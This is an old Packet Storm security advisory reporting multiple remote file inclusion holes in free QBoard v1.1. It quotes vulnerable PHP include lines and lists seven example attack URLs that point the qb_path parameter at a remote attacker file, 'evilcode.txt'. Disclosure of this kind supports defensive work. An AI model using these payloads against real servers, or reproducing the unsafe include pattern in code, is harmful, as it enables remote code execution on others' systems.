QBoard11.txt

2006-07-09T00:00:00
ID PACKETSTORM:48036
Type packetstorm
Reporter CrAsh_oVeR_rIdE
Modified 2006-07-09T00:00:00

Description

                                        
                                            `free QBoard v1.1 Multiple Remote File include  
-------------------------------------------------  
Discovered By CrAsh_oVeR_rIdE  
Arabian Security Team  
-------------------------------------------------  
site of script:http://sourceforge.net/projects/freeqboard/   
-------------------------------------------------  
Vulnerable: free QBoard v1.1  
-------------------------------------------------  
vulnerable code:  
----------------------  
1- in index.php  
include $qb_path."incs/mysql.php";  
include $qb_path."incs/crypt.php";  
----------------------------------  
2- in about.php  
include $qb_path."incs/header.php";  
----------------------------------  
3- in contact.php  
include $qb_path."incs/header.php";  
----------------------------------  
4- in delete.php  
include $qb_path."incs/mysql.php";  
include $qb_path."incs/crypt.php";  
----------------------------------  
5- in faq.php  
include $qb_path."incs/header.php";  
----------------------------------  
6- in features.php  
include $qb_path."incs/header.php";  
----------------------------------  
7- in history.php  
include $qb_path."incs/mysql.php";  
include $qb_path."incs/crypt.php";  
----------  
$qb_path parameter File inclusion   
-----------------------------------------------------------------------------------------------------------------------------------------  
vulnerable files :  
--------------------  
index.php  
about.php  
contact.php  
delete.php  
faq.php  
features.php  
history.php  
-------------------------------------------------  
example:  
www.example.com/(path)/index.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/about.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/contact.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/delete.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/faq.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/features.php?qb_path=http://evilcode.txt?  
www.example.com/(path)/history.php?qb_path=http://evilcode.txt?  
-------------------------------------------------  
Discovered By CrAsh_oVeR_rIdE  
E-mail:KARKOR23@hotmail.com  
Site:www.lezr.com  
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member  
  
`